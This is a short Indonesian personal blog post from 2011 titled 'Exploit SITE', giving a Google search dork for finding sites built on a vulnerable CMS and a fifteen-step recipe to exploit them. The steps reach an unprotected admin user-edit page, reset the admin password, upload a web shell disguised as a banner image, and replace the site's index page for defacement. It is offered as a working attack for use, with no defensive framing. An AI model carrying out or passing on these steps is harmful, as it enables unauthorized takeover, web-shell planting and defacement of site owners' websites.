Catatan Belajar

welcome

Beruntung sekali seorang anak muda meninggal dgn brjuta-juta pahala, Malang kali seorang manusia yg meninggal dgn secuil pahala, Berilah hamba kaya akan ridhoMu ya Allah.

Monday, October 10, 2011

Exploit SITE

Dark : inurl:media.php?module=home
Exploit : http://situsTarget.com/admin/content.php?module=user
1. Ketik di google inurl:media.php?module=home
2. Cari target : http://situs_target.com/media.php?module=home
3. Masuk ke admin (situs_target.com/admin)
4. Lalu masuk ke sini (situs_target/admin/content.php?module=user)
5. Lalu klik edit (Terserah mau diisikan apa, Bebas)
6. Login (situs_target.com/admin) password yang kamu edit tadi
7. Tambah banner , isi bebas .. untuk gambar , upload kan shell kalian ..
8. Edit kembali banner yang tadi
9. Pada gambar klik kanan , pilih copy image URL
10. Buka tab baru , dan paste ...
11. Maka shell kalian akan terbuka
12. Cari index.php
13. Upload index.htm anda ..
14. Rename index.php menjadi index1.php
15. Finish

2 comments:

  1. hahah.. tu hanya sebagai catatan aja mas...
    tu buat liat user n password admin dalam suatu site mas...

    ReplyDelete